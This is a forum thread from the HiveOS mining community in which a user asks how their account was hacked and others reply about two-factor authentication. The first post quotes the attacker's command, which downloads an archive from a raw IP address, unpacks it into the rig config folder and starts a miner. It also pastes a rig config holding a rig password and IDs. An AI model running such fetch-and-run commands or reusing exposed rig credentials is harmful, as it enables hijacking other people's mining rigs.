OS
Pool
ASIC Firmware
ASIC Hub
More
blog
Blog
News and Articles
forum
Forum
Top discussions, announcements, help
Show all articles
Referral Program
referral
Increase your income with Hive. Invite your friends and earn real cryptocurrency!
Get your referral link

How did hacker hack my HiveOS account?

Account
#1

Hello.
I was just hacked. I don’t understand how it is possible for someone to guess the password or at all know my account id/Username.

Anyone here that can clear this out for me? I appreciate all answers.
Here is log from hnotifications
Login - 94.234.41.95 - 1:40, July 18, 2021

Hacker used this command before I interrupted him/her:
wget http://144.76.186.179:19607/ETH.tar.gz && tar -xvf ETH.tar.gz -C /hive-config && miner start

Here is the content of this config file:
### MINERS HIVE CONFIG ################################

#URL where hive server is
HIVE_HOST_URL=“http://api.hiveos.farm

#Id of the rig, numeric value from admin panel
RIG_ID=2226389

#Rig password as in admin panel
RIG_PASSWD=“p7bRgf40”

#Rig hostname
WORKER_NAME=“e”

#Id of the farm
FARM_ID=1111848

#Selected miners
MINER=nanominer
MINER2=

#Rig timezone
TIMEZONE=“US/Pacific”

#Watchdog
WD_ENABLED=0

#Hive Shell server host
HSSH_SRV=“shell.hiveos.farm”

#Options

#2

I’m guessing you didn’t use 2-factor.

That should seriously be a requirement in 2021 for every web service.

So many people on the coinbase and binance subreddit claimed they were hacked or their crypto was stolen and it’s all the exchange’s fault. 99% user error.

2-factor, simplest thing ever to set up. And never use SMS as 2-factor. It’s literally the most simple OPSEC.

Point of crypto is that you’re fully in charge of your money. Do the research or risk getting hacked and scammed. No sympathy for those who don’t DYOR.

#3

Well. If I where you. I wouldn’t say that it is user fault that hackers hacked in. I did not open the door or invite them =)
Nether did I give them my username, rig ID or anything else that can identify me as a registered user.

I’m a programmer myself and I build back & front end. There are many ways to assume but someone is monitoring hives data. (Not mine because my pc is not infected or monitored)

2 factor ads extra layer of security but how could I get hacked directly on the start before activating 2 factor. Something isn’t right here…

#4

It has nothing to do with you 2FA.
Please read the following article on how it is hacked and how to prevent it.
Hope this helps.

#5

This topic was automatically closed 416 days after the last reply. New replies are no longer allowed.